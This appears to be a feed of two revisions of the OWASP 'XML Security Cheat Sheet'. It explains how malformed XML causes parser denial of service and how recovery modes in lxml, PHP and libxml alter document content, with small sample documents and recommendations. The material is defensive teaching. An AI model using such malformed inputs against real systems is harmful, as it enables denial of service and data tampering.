Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. This provides a complex scenario for developers, and a fun environment for hackers. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This talk will analyze how to infer new attack vectors by analyzing the current vulnerabilities, and how it is possible to affect common libraries and software. This cheatsheet will also provide recommendations for safe deployment of applications relying on XML.&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document shouldn’t undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). The following variables should be analyzed when exploring this behavior:&lt;br /&gt;
&lt;br /&gt;
* Parser inner workings: Each parser has its own particularities, which may make them more or less susceptible to malformed documents, thus requiring more time.&lt;br /&gt;
* Document size: Processing a large well-formed document requires more time than doing the same for a smaller well-formed document. If the parser is susceptible, this also applies to malformed documents.&lt;br /&gt;
* Parser limitation: Parsers may be limited to processing no more than a certain amount of certain data types. Maximum limits for elements, attributes, or entities may be set by default or by the developers. For example, the Java API for XML processing (JAXP) limits each element to no more than 10,000 attributes3.&lt;br /&gt;
* Architecture: The amount of computational resources available to the XML parser.&lt;br /&gt;
&lt;br /&gt;
Apache Xerces-J XML may serve as an example for this type of vulnerability; in this case, malformed data caused the XML parser &amp;quot;&amp;lt;i&amp;gt;...to consume CPU resource for several minutes before the data [was] eventually rejected. This behavior can be used to launch a denial of service attack against any Java server application, which processes XML data supplied by remote users.&amp;lt;/i&amp;gt;&amp;quot;. An attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
&lt;br /&gt;
To avoid this attack, you must confirm that your version of the XML processor does not take additional time to process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following three scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document Containing Unexpected Characters ===&lt;br /&gt;
According to the XML specification, the string -- (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document using Normalization ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your CDATA6 sections. This means that they will update the special characters contained in the CDATA section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a CDATA section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Well-Formed Document Including Content Modification ===&lt;br /&gt;
The contents of certain malformed documents could be altered after being recovered. Consider the scenario where a book is on sale unless the value of its &amp;quot;onsale&amp;quot; element is no:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;book&amp;gt;&lt;br /&gt;
  &amp;lt;item&amp;gt;ABC101&amp;lt;/item&amp;gt;&lt;br /&gt;
  &amp;lt;value&amp;gt;10&amp;lt;/value&amp;gt;&lt;br /&gt;
  &amp;lt;onsale&amp;amp;&amp;gt;no&amp;lt;/onsale&amp;gt;&lt;br /&gt;
  &amp;lt;onsalevalue&amp;gt;5&amp;lt;/onsalevalue&amp;gt;&lt;br /&gt;
&amp;lt;/book&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous onsale element contains the &amp;amp; character, which is not supposed to be there. The resulting value of that element may be different after document recovery:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;book&amp;gt;&lt;br /&gt;
  &amp;lt;item&amp;gt;ABC101&amp;lt;/item&amp;gt;&lt;br /&gt;
  &amp;lt;value&amp;gt;10&amp;lt;/value&amp;gt;&lt;br /&gt;
  &amp;lt;onsale/&amp;gt;&lt;br /&gt;
  &amp;amp;amp;gt;no&lt;br /&gt;
  &amp;lt;onsalevalue&amp;gt;5&amp;lt;/onsalevalue&amp;gt;&lt;br /&gt;
&amp;lt;/book&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224121</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224121"/>
				<updated>2016-12-13T19:39:49Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. This provides a complex scenario for developers, and a fun environment for hackers. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This talk will analyze how to infer new attack vectors by analyzing the current vulnerabilities, and how it is possible to affect common libraries and software. This cheatsheet will also provide recommendations for safe deployment of applications relying on XML.&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document shouldn’t undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). The following variables should be analyzed when exploring this behavior:&lt;br /&gt;
&lt;br /&gt;
* Parser inner workings: Each parser has its own particularities, which may make them more or less susceptible to malformed documents, thus requiring more time.&lt;br /&gt;
* Document size: Processing a large well-formed document requires more time than doing the same for a smaller well-formed document. If the parser is susceptible, this also applies to malformed documents.&lt;br /&gt;
* Parser limitation: Parsers may be limited to processing no more than a certain amount of certain data types. Maximum limits for elements, attributes, or entities may be set by default or by the developers. For example, the Java API for XML processing (JAXP) limits each element to no more than 10,000 attributes3.&lt;br /&gt;
* Architecture: The amount of computational resources available to the XML parser.&lt;br /&gt;
&lt;br /&gt;
Apache Xerces-J XML may serve as an example for this type of vulnerability; in this case, malformed data caused the XML parser &amp;quot;&amp;lt;i&amp;gt;...to consume CPU resource for several minutes before the data [was] eventually rejected. This behavior can be used to launch a denial of service attack against any Java server application, which processes XML data supplied by remote users.&amp;lt;/i&amp;gt;&amp;quot;. An attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
&lt;br /&gt;
To avoid this attack, you must confirm that your version of the XML processor does not take additional time to process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following three scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document Containing Unexpected Characters ===&lt;br /&gt;
According to the XML specification, the string -- (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
   &amp;lt;!-- one&lt;br /&gt;
     &amp;lt;!-- another comment&lt;br /&gt;
   comment --&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document using Normalization ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your CDATA6 sections. This means that they will update the special characters contained in the CDATA section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
   &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a CDATA section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
   &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
 &amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Well-Formed Document Including Content Modification ===&lt;br /&gt;
The contents of certain malformed documents could be altered after being recovered. Consider the scenario where a book is on sale unless the value of its &amp;quot;onsale&amp;quot; element is no:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	</feed>